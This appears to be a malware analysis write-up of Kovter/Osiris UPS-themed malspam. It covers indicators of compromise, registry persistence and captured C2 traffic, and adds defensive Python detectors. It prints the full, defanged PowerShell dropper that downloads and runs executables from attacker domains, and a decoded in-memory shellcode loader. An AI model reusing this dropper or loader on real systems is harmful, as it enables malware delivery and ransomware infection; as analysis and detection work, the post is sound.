A little late for this write-up, but here is an example of some Kovter/Osiris malspam that I was able to find from late last week. While researching some of the URLs below I came across My Online Security’s blog post, which had the same domains listed. It looks as if they have been keeping tabs on these types of emails, and the callbacks used, as well.
All artifacts from this investigation can be found in the GitHub repo linked here.
The attack is a simple one: phishing emails are sent to users claiming that a UPS shipment has been shipped, or could not be delivered, which prompts them to act. The attachment is a zip file which, once unzipped, is really an LNK file made to look like a Word document. The attack relies on hiding the LNK file extension, since the OS only shows the .doc extension. The shortcut's target text box also contains PowerShell code, as seen in the image below. Microsoft has an article on this attack vector here and an updated article on the Kovter infection here. All of this ends with the system being encrypted with Osiris.
*Indicators of Compromise:*
*Artifacts:*
File name: a1.exe
File size: 380KB
MD5 hash: fbe08cc20207d5c4f61757484568b9b0
VirusTotal: http://www.virustotal.com/en/file/bd9a3d09c31a034a9434a5f182624b70e418ed4421ee991069d3b47a156bd6ba/analysis/
First submitted: 2017-02-03 00:46:14 UTC
Detection ratio: 18 / 56
-----
File name: a2.exe
File size: 340KB
MD5 hash: f503802c3399f2f58c9a9fdeaffdd1f6
VirusTotal: NA
-----
File name: c3046d01.e5782001b
File size: 6KB
MD5 hash: 85445dde7246db5feef9f853c7aa05e1
VirusTotal: NA
-----
File name: e7da1628.bat
File size: 77B
MD5 hash: 65ab194835a57961575c64996f91e8c3
VirusTotal: NA
*Analysis of malware*
Starting from the system perspective: the malicious LNK file, when executed, runs the following PowerShell code:
"C:\Windows\System32\WindowsPowerShell\v1[.]0\powershell[.]exe" -ExecutionPolicy ByPass -NoProfile -command $ll='helpdeskng[.]com','custommaidbooks[.]com';function g($f){Start $f;};function z{return New-Object System[.]Net[.]WebClient;};$ld=0;$cs=[char]92;$fn=$env:temp+$cs;$dc=$fn+'a[.]doc';$c='';$q=New-Object System[.]Random;if(!(Test-Path $dc)){for($i=0;$i -lt 2000;$i++){$c=$c+[char]$q[.]Next(1,255);};$c | Out-File -FilePath $dc;};g($dc);$lk=$fn+'a[.]txt';$y=z;if(!(Test-Path $lk)){New-Item -Path $fn -Name 'a[.]txt' -ItemType File;for($n=1;$n -le 2;$n++){$f=$fn+'a'+$n+'[.]exe';$r='/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b'+$n;for($i=$ld;$i -lt $ll[.]length;$i++){$u=$ll[$i]+$r;$u='http://'+$u;$y[.]DownloadFile($u,$f);if(Test-Path $f){$v=Get-Item $f;if($v[.]length -gt 10000){$ld=$i;g($f);break;};};};};};notepad[.]exe
This is what downloads the two files “a1.exe” and “a2.exe”: the code requests the URI “‘/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b’+$n” inside a loop over $n, and “$f=$fn+’a’+$n+’.exe’;” gives each file its name once downloaded. This can also be seen in the PCAP:
GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b1 HTTP/1.1
Host: helpdeskng[.]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 03 Feb 2017 08:49:35 GMT
Server: Apache
Content-Disposition: attachment; filename=f5.png
Content-Length: 379904
Cache-Control: max-age=5184000
Expires: Tue, 04 Apr 2017 08:49:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
-----
GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b2 HTTP/1.1
Host: helpdeskng[.]com

HTTP/1.1 200 OK
Date: Fri, 03 Feb 2017 08:49:36 GMT
Server: Apache
Content-Disposition: attachment; filename=868d.png
Content-Length: 339777
Cache-Control: max-age=5184000
Expires: Tue, 04 Apr 2017 08:49:36 GMT
Content-Type: image/png

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
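One defensive check the capture suggests: both responses declare Content-Type: image/png and a .png filename while the body begins with the MZ header of a Windows executable. The following Python is an added example (not from the original post) that parses a raw HTTP response and flags that mismatch; the sample responses are constructed from the headers above with a synthetic DOS stub in place of the real binary.

```python
"""Flag HTTP responses whose declared type disagrees with the body's magic bytes."""
import re

# Leading bytes of common formats. "MZ" is the DOS/PE header seen in the capture.
MAGIC = {
    b"MZ": "application/x-dosexec",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"%PDF-": "application/pdf",
    b"PK\x03\x04": "application/zip",
}

# Declared types that should never carry an executable body.
BENIGN_DECLARED = ("image/", "text/", "application/pdf")
BENIGN_EXTENSIONS = (".png", ".jpg", ".gif", ".txt", ".pdf")


def parse_response(raw: bytes):
    """Split a raw HTTP response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def sniff_type(body: bytes) -> str:
    """Return the MIME type implied by the body's leading bytes, or 'unknown'."""
    for magic, mime in MAGIC.items():
        if body.startswith(magic):
            return mime
    return "unknown"


def disposition_filename(headers: dict) -> str:
    """Pull filename=... out of Content-Disposition, with or without quotes."""
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    return m.group(1) if m else ""


def check_response(raw: bytes) -> dict:
    """Compare declared Content-Type / filename against the sniffed body type.

    'suspicious' is set when the body is a PE but the server dressed it up as
    an image, text or PDF, either via Content-Type or via the filename.
    """
    _, headers, body = parse_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = sniff_type(body)
    fname = disposition_filename(headers)
    suspicious = sniffed == "application/x-dosexec" and (
        declared.startswith(BENIGN_DECLARED) or fname.lower().endswith(BENIGN_EXTENSIONS)
    )
    return {"declared": declared, "sniffed": sniffed, "filename": fname, "suspicious": suspicious}


# Constructed sample: headers copied from the first response in the capture,
# body replaced by a synthetic DOS stub rather than the real a1.exe bytes.
SAMPLE_PE_AS_PNG = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Fri, 03 Feb 2017 08:49:35 GMT\r\n"
    b"Server: Apache\r\n"
    b"Content-Disposition: attachment; filename=f5.png\r\n"
    b"Content-Length: 379904\r\n"
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"This program cannot be run in DOS mode."
)

# Constructed control: a genuine PNG signature under the same declared type.
SAMPLE_REAL_PNG = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: image/png\r\n"
    b"\r\n"
    b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"
)

if __name__ == "__main__":
    for sample in (SAMPLE_PE_AS_PNG, SAMPLE_REAL_PNG):
        print(check_response(sample))
```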
During this time Word is opened as well, but from what I can see there does not seem to be anything malicious about it.
Once these files have been downloaded to the system, “a1.exe” is kicked off first and starts looking at different registry keys and file locations on the system; shortly thereafter the “a2.exe” process starts and proceeds to look at different things in the registry and file system while setting registry values. For example:
Path: HKCU\Software\7GWsaAe\GsDyqtU6qn
Type: REG_SZ
Length: 892,566
Data: (binary blob omitted)
-----
Path: HKCU\Software\7GWsaAe\xBQlLx
Type: REG_SZ
Length: 106,344
Data: (key/value string data omitted)
-----
Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\lapxjqc
Type: REG_SZ
Length: 910,252
Data: (binary blob omitted)
-----
Path: HKCU\Software\lqoiarkklq\txpge
Type: REG_SZ
Length: 104,872
Data: (key/value string data omitted)
At this time I cannot be certain what the purpose of each of these files is, or whether their purposes are completely different or overlap. The only thing apparent to me at this time is that the a1.exe process is the main process that encrypts the files on the system, whereas a2.exe does not handle the encryption and seems to handle the persistence part of this infection.
The PowerShell script also kicks off two other processes (both regsvr32.exe), which are used to create persistence on the now-infected system via registry keys and the file system, and also to keep an open connection to the C2 systems.
The interesting thing about one of these regsvr32.exe processes (PID 612) is that, when the process is started from its parent, the following block of code with a base64-encoded payload is present:
APPDATA=C:\Users\Administrator\AppData\Roaming
aykqh=iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('<base64 payload omitted>')))
Decoding the base64 gives the following PowerShell; most of it is a byte array ($sc32) holding the shellcode, and the rest is the loader that maps and runs it:
# Random junk comments (#xxxx lines and <#xx#> padding) stripped for readability.
sleep(15);
try{
# gdelegate: builds a delegate type in memory for an arbitrary native function signature
function gdelegate{
    Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
    $TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
    $TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
    $TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
    return $TypeBuilder.CreateType();}
# gproc: resolves an export address through System.dll's private GetModuleHandle/GetProcAddress wrappers
function gproc{
    Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
    $SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
    $UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
    return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
[Byte[]] $sc32 =
# [... bulk of the $sc32 shellcode byte array omitted ...]
,0x97,0xED,0x6A,0xFE,0x7E,0x71,0x5B,0xED,0x2F,0xA4,0xC5,0xC7,0x8E,0x38,0x25,0xC9,0x97,0x04,0x16,0xB4,0x67,0xDD,0xFA,0x42,0x4F,0xBE,0x20,0x01,0x2D;
# Allocate memory for the shellcode (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)
$pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
if($pr -ne 0){
    # Copy the array into the allocation one byte at a time via msvcrt!memset
    $memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
    for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
    # Execute it on a new thread
    ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
}
sleep(1200);
}catch{}
exit;
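A small analysis helper for loaders of this shape, added here as an example and not code from the original post: it base64-decodes the blob, strips the junk comment padding, carves the $sc32 byte array out as raw bytes, and lists the APIs resolved through gproc so the allocate/write/execute triad can be flagged. SAMPLE_SCRIPT is a constructed miniature with the same layout as the decoded loader above.

```python
"""Decode and de-obfuscate a Kovter-style PowerShell loader, carve its shellcode
byte array, and list the Win32 APIs it resolves at runtime."""
import base64
import re

# Constructed stand-in for the decoded loader: junk '#' lines between statements,
# '<#..#>' padding inside the byte array, and the three gproc lookups seen above.
SAMPLE_SCRIPT = "\r\n".join([
    "#avobmsjvucjuocxunkajuvogibdcmkeqp",
    "sleep(15);try{",
    "#icebofnc",
    "[Byte[]] $sc32 = ",
    "0x55,<#rpr#>0x8B,0xEC,<#ji#>0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57;",
    "#ebfvxkffvl",
    "$pr=(gproc kernel32.dll VirtualAlloc).Invoke(0,$sc32.Length,0x3000,0x40);",
    "$memset=(gproc msvcrt.dll memset);",
    "(gproc kernel32.dll CreateThread).Invoke(0,0,$pr,$pr,0,0);",
    "#usrucw",
])
# The captured command carries the script as plain base64 (constructed here).
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode()).decode()

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)                      # <#rpr#> padding
JUNK_LINE = re.compile(r"^[ \t]*#[A-Za-z]+[ \t]*\r?$", re.M)      # #wqdyo lines


def decode_loader(b64_blob: str) -> str:
    """Base64-decode the blob and drop the random comment padding."""
    text = base64.b64decode(b64_blob).decode("utf-8", errors="replace")
    text = BLOCK_COMMENT.sub("", text)
    text = JUNK_LINE.sub("", text)
    return "\n".join(line for line in text.splitlines() if line.strip())


def extract_shellcode(script: str, var: str = "sc32") -> bytes:
    """Return the bytes assigned by '[Byte[]] $<var> = 0x..,0x..;' as raw bytes."""
    pattern = r"\[Byte\[\]\]\s*\$" + re.escape(var) + r"\s*=\s*(.*?);"
    m = re.search(pattern, script, re.S)
    if not m:
        raise ValueError(f"no [Byte[]] array assigned to ${var}")
    body = BLOCK_COMMENT.sub("", m.group(1)).replace("\r", "").replace("\n", "")
    return bytes(int(tok.strip(), 16) for tok in body.split(",") if tok.strip())


def resolved_imports(script: str) -> list[tuple[str, str]]:
    """Every (dll, export) pair the loader resolves through its gproc helper."""
    return re.findall(r"\(gproc\s+([\w.]+)\s+(\w+)\)", script)


def injection_triad(script: str) -> bool:
    """True when the loader resolves the allocate + write + execute set used above."""
    funcs = {f.lower() for _, f in resolved_imports(script)}
    return {"virtualalloc", "memset", "createthread"} <= funcs


if __name__ == "__main__":
    cleaned = decode_loader(SAMPLE_B64)
    sc = extract_shellcode(cleaned)
    print(f"{len(sc)} shellcode bytes, starts {sc[:3].hex()}")   # 55 8b ec = push ebp; mov ebp,esp
    print("imports:", resolved_imports(cleaned))
    print("injection triad:", injection_triad(cleaned))
```

On the real sample the carved bytes can be written to a .bin file and loaded into a disassembler at offset 0 as 32-bit code.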
As with the two dropped files above, I am not sure what the difference is between the two regsvr32.exe processes. The parent process (PID 1740) is the one that keeps reaching out to the C2s, as seen in the image labeled “C2s.” This parent process is also responsible for creating and setting further registry keys/values, which looks to be related to what the “a2.exe” process was doing (for persistence):
Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\tscz
Type: REG_SZ
Length: 34
Data: c2lCgcJpAleIXg==
-----
Path: HKCU\Software\lqoiarkklq\tscz
Type: REG_SZ
Length: 34
Data: dD9Hi8VsVasp+w==
-----
Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\rhllonear
Type: REG_SZ
Length: 66
Data: dW0V3ZU4UEEp/bQvhCo/2F9ajF1fefY=
Persistence is maintained via an entry in the “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” registry key, which throws an error when you try to view it, as seen in the image below.
Using Autoruns, I am able to see the entry in the registry and that it points to “C:\Users\Administrator\AppData\Local\1354e279\e7da1628.bat”. That batch file contains the following:
start "yYPkyKv4BygZ9zHX9iqui6" "%LOCALAPPDATA%\1354e279\c3046d01.e5782001b"
The file launched by the batch file (“c3046d01.e5782001b”) looks to be an encrypted file of sorts.
From the network side, the malware seems to be pretty straightforward. Once the files have been downloaded by the PowerShell script and executed, we see POST callbacks to a couple of different IP addresses:
POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 1103
Connection: Keep-Alive

ZZd=%CFi%0FG%D7j%A0%3A%B4%A8%0Bd%B8%B3nU%DE%8F%A3%BF%A9q%CF%84%3C%23%E4%21&uunC=%07AT%95w%25%CE%5C%A9%186%CD%C0%9E%5D%1E%8Es%B2%98%DDS%96%BDx%1F%0E%1E%C3%DF%3CI%DA%E6%9E%E5%01%CA%3E%1D%E9I%E07%2CN%90%83&rhjQSF=.%D60%D1%9At%9FC%E1%1FA%14%5D%ED%B0&IwVFWpRk=%FF9v%C5%D0%067%AB%A4kN%AD%F4%FA%18i&nFzv=1%90%0Ap%3Fw%14%85-%FB%BDg%95-%02%22&yndZOvyk=s%D4%FBK%9F%26%26%7Es%FA%89%0F%29G%AF%BD%1Fe%1F%F0%DBB%3F%C962%A9%D1%80e%7C&lWdL=%89%DE%1BG%07%EA%B8%F6Q%21%DEH%7D%9F%D6L%92%C1%A1%0AC%B1%23%7C%8B%83%BA%AD%EF%8C%D8%BA%19%0B%CBYyT%89%80&lIRiyP=%80%AD%90%CCI%E6%9CP%F5i%04Z%C1Lb%01y%C9%C0%3F2%25%D8D%E9%E2%86%2C%AAsg%EDI%CA%84T78%9F%AB%1B%A3%C4%EF%CD%21&IzGlUb=%A6Q%28%C7%5B9F%03%90%0E%C6%1C%E2%F1%F1%1Cr1M%7B%FF%13%8F%92%D5%3E%3CL%D8Y%BB%BF3%5D%7F%BD%ED%EDp%B3d%8C&dPz=%A4x%91o%D50%7D%26%99%01%F3%8En%B4%BB%90r%18%F1%93%16%BA%E7%FB%E2%97%95%8C%B8%1A%3E2+%DCS%E0%9B&tUNM=%BAYi%93%8D%C3%40%CA%7Cx%EEJa%D3U%95%2Fu%AD&LZNBvnt=%83f%27%29%0Ag%5D%1Dg%A5%DC%2C%C1%0C%3B%01%09%AC%D8%7F%3F%3C%B88f%E3%11%C0%60%CE%8D%9F0%95Pk%91&bNZLk=%8F%A8_%C6%D5%10%C2%91%E3%EA%9B%5EsH%C6CT%A7%00%7F&dItZlk=%B6%F7%8E%14%83%A9%83%B0%ABgM

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:30 GMT
Content-Type: application/octet-stream
Content-Length: 373
Connection: keep-alive

[373 bytes of binary response body]
-----
POST /checkupdate HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://194[.]31[.]59[.]5/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 194[.]31[.]59[.]5
Content-Length: 690
Connection: Keep-Alive

SIyTD=%3E%E9%90%D6%BAh-%93%60C%D5%FC%DA%7C%B9%00&SjAVD=%BE%21%D9s%B6%D8%13U%5C%B3%CC%B8S%F9%F9FXO%8E%076%C7&FqiGQdBN=%2F%88B%A4%D9lo%BA%D6%06%1ER%CC%16H%E0%2F%E3%A2%BE%91%2F%BB%3C%D8%AA%05%91%B3xy%F9%B1&cXlYLNr=%7C%CE%C0%C9%5E%C4%DByY%BC%B2%2B%9C%BC%8B%BA%E9V%D7%D7%7E%5B%F8g%063%3C%F6F%1B%40C9%F0%5CI&KXLjATwr=%18y%E0%1F4%A3%2A%DB%06%14%7C%B6t%AF%15g%F5%C2D%F5%F1%BAC%DE%0F%80B%CF%D8%FB%8F%1C%C4%92%19%D0&sEREwsM=%86C%E2%B6%95%F9%CEK%0B%1F%1FT%97%3D%FBb%5C%8B%27Vq%99%94%D03j%81%E1B%8F%1F2%0A%A3%D0SB%BD&TEZc=P%7E%D5%0F%D3%92%B3%17%96%0A%A9%00%94%AB%86%DFp%9B%D8%13%98%C6E%8A%0Eq%05%1E%BFw%E1%0A%D6%A9%D6%B3%F5&ahXmRSFz=%5E%C1mAf%1A%29%99%B6%E9%8C%D9%AA%0D%DB%1E%8A%5Dtg%B8%D37OS%C2%83%F7L

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 03 Feb 2017 08:50:31 GMT
Content-Type: application/octet-stream
Content-Length: 1074
Connection: keep-alive

[1074 bytes of binary response body]
-----
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 128[.]1[.]191[.]207
Content-Length: 472
Cache-Control: no-cache

JmwW3JA7UCEHHPM2MrS0nEz+ws7Z4gp6fZB4a79ARwr7p25dRmYz3EJYxn7vHsYlIuXGtijSuctDBxhvdOGEME+lttPV5RM8+awTwL4orbm4RsuyxUnzbflw2D+TguM62A4mCVujKnO4jAMHXSJTCzDGEXJjnaAwuI5Cctd7db5OXwKIm2b8gDDaglUOE7Ndw4hA/WQomcVsIAYAFOLjrABReSiXQZB6reI+YpUfUGyFNMshy8tF4MD86Lrv6unosp1hQHdx3ojHO5B0d98TtSGOBViWWnmuGUo6GnIDOfF2Ge1cEgP3jUE9I+b5dWnMC4c+3vuF/5zOvr5cogaw4fx7LehP1os5sf7mpbSsi5mYWuqgxnES1Z6qk2OgPDLGq6OyZ+Qa4DaGM/nANLA3rNOvYO51WE7KdF8ze2AYgrE2NeO/+7AIhMIlXkStX5igAnd+ph9yYIWtm3dsY9Vl5w==

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Fri, 03 Feb 2017 08:50:55 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>
-----
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Host: 104[.]247[.]149[.]240
Content-Length: 452
Cache-Control: no-cache

d25A25FqWGqzdkND5TCryGWbNsWcd08JBGFDNKTFfQ7K9hgM43RuwLkP+htLhcmMdwSS+VRtiDprb67iwET1c0zGXK8scYQGJ0ni289fcN52qe8FsyqHJnH7u3CAG6o3MzmJBIoILYnLUTKo0aEwH2R9PWE5gVrUjx8SjYaTnr0BJlvYKRNmUJpqVE/s6iK6UW9Xb0yrbrCw6Bc2jA+bNiN19F36G5MYISj1AkTn/TIz57THvT/R4YaHPHYPV+3TcsmZFpdup9KQ7AvAtksMNbOP5oMxLg8yAOx1hgkruEx7lt/9oSwCFLyQH9V6ZjZuObT4RFm8QZQSXyq19J8oJOajur2AyBE0XTymvyWRPvVpx3o8kaaurX04ChaZm3EdqLrchfJ58uROXM04MOkhln53WbcliGaK9BOXttqjWFUDmtdFho7lq91zW1A/8ghJxUE=

HTTP/1.1 301 Moved Permanently
Server: nginx/1.10.2
Date: Fri, 03 Feb 2017 08:50:58 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: http://devel[.]highproxies[.]com/

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.10.2</center>
</body>
</html>
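The /checkupdate beacons above share several traits that are cheap to match in proxy logs: POST to /checkupdate, a Referer that is just the C2 root, the XMLHttpRequest header, the static MSIE 7.0 User-Agent, an application/octet-stream reply, and a form body whose random-named parameters percent-encode binary data. The scorer below is an added example, not part of the original post; the record layout and the two non-beacon entries are constructed, and the beacon entry reuses header and body values from the capture.

```python
"""Score HTTP proxy records for the Kovter /checkupdate beacon traits seen above."""
from urllib.parse import unquote_to_bytes

# Static Internet Explorer 7 UA string carried by every captured request.
KOVTER_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; "
             "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)")

RECORDS = [
    {   # beacon shaped like the captured POST /checkupdate (body trimmed to two params)
        "method": "POST", "host": "194.31.59.5", "path": "/checkupdate",
        "headers": {"Referer": "http://194.31.59.5/", "x-requested-with": "XMLHttpRequest",
                    "Content-Type": "application/x-www-form-urlencoded", "User-Agent": KOVTER_UA},
        "body": "ZZd=%CFi%0FG%D7j%A0%3A%B4%A8%0Bd%B8%B3nU%DE%8F%A3%BF%A9q%CF%84%3C%23%E4%21"
                "&tUNM=%BAYi%93%8D%C3%40%CA%7Cx%EEJa%D3U%95%2Fu%AD",
        "resp_content_type": "application/octet-stream",
    },
    {   # constructed benign XHR form post from an internal web app
        "method": "POST", "host": "intranet.example", "path": "/api/checkupdate",
        "headers": {"Referer": "http://intranet.example/app", "x-requested-with": "XMLHttpRequest",
                    "Content-Type": "application/x-www-form-urlencoded",
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/51.0"},
        "body": "version=1.2.3&channel=stable",
        "resp_content_type": "application/json",
    },
    {   # constructed copy of the second-tier POST / with a base64 body and the same UA
        "method": "POST", "host": "128.1.191.207", "path": "/",
        "headers": {"Content-Type": "application/x-www-form-urlencoded",
                    "User-Agent": KOVTER_UA, "Cache-Control": "no-cache"},
        "body": "JmwW3JA7UCEHHPM2MrS0nEz+ws7Z4gp6fZB4a79ARwr7p25dRmYz3EJYxn7vHsYl",
        "resp_content_type": "text/html",
    },
]


def binary_ratio(body: str) -> float:
    """Share of percent-decoded parameter-value bytes that are not printable ASCII."""
    raw = b"".join(unquote_to_bytes(p.split("=", 1)[1]) for p in body.split("&") if "=" in p)
    if not raw:
        return 0.0
    return sum(1 for b in raw if b < 0x20 or b > 0x7E) / len(raw)


def beacon_indicators(rec: dict) -> list[str]:
    """Name each trait of the captured beacon that this record exhibits."""
    hdr = {k.lower(): v for k, v in rec["headers"].items()}
    hits = []
    if rec["method"] == "POST" and rec["path"].endswith("/checkupdate"):
        hits.append("path:/checkupdate")
    if hdr.get("referer") == f"http://{rec['host']}/":
        hits.append("referer:bare-host")             # Referer is just the C2 root
    if hdr.get("x-requested-with") == "XMLHttpRequest":
        hits.append("hdr:xhr")
    if hdr.get("user-agent") == KOVTER_UA:
        hits.append("ua:static-msie7")
    if rec.get("resp_content_type") == "application/octet-stream":
        hits.append("resp:octet-stream")
    if (hdr.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and binary_ratio(rec["body"]) > 0.4):
        hits.append("body:binary-form-params")        # random names, encrypted values
    return hits


def is_beacon(rec: dict, threshold: int = 4) -> bool:
    """Alert only when several traits coincide; any single one is common in benign traffic."""
    return len(beacon_indicators(rec)) >= threshold


def flagged_hosts(records: list) -> list[str]:
    """Destination hosts whose records cross the indicator threshold."""
    return sorted({r["host"] for r in records if is_beacon(r)})


if __name__ == "__main__":
    for r in RECORDS:
        print(r["host"], r["path"], beacon_indicators(r), "BEACON" if is_beacon(r) else "")
```

The base64 POST / to the second-tier host shares only the User-Agent with the /checkupdate beacon, so it stays below the threshold here; catching that leg needs a separate rule (POST / with a bare base64 body and no Referer), since the static UA alone is too common to alert on.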
It is here that we see a callback over HTTPS with a Let’s Encrypt SSL certificate:
[TLS handshake and certificate dump; recoverable fields:]
Client Hello SNI: devel.highproxies.com
Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
Validity: 161230090800Z (2016-12-30 09:08:00 UTC) to 170330090800Z (2017-03-30 09:08:00 UTC)
Subject CN: devel[.]highproxies[.]com
Subject Alternative Name: devel.highproxies.com
OCSP: http://ocsp.int-x3.letsencrypt.org/
CA Issuers: http://cert.int-x3.letsencrypt.org/
CPS: http://cps.letsencrypt.org
Policy notice: This Certificate may only be relied upon by Relying Parties and only in accordance with the Certificate Policy found at http://letsencrypt.org/repository/
We can also see in Wireshark’s Conversations pane (see below) that there are attempts to talk to several IP addresses over port 8080, which failed since they never got a response (only 1 packet was sent).
While letting Process Explorer run as I was looking into the Process Monitor logs and other things, I kept seeing the “regsvr32.exe” process (PID 1740) constantly connecting to different IP addresses and ports. Since the Wireshark capture had already finished, I started another one and let it capture some of that traffic. This time around I got different IP addresses (except for the one using HTTPS), and also different IP addresses being contacted on port 8080 (see the image below).
Seeing this, I used Strings2 to look into the memory of the regsvr32.exe process to see if there was anything in there that might give an idea of what the callbacks would be. Piping that out to a text file, I searched for keywords like “http” (3427 hits) and “/upload.php” (17 hits). Those hits reflect the following IP addresses:
185[.]117[.]72[.]90
189[.]177[.]220[.]156
The interesting thing here is the block of text found when searching for “/upload.php” in Notepad++: it contains 133 different IP addresses along with what, according to this article from PhishMe, is the configuration file for Kovter, including the download URLs it uses to patch the system to the latest versions of Flash and the .NET Framework. *Note:* I came across the PhishMe link when looking up the term “nonuldnet32” in Google.
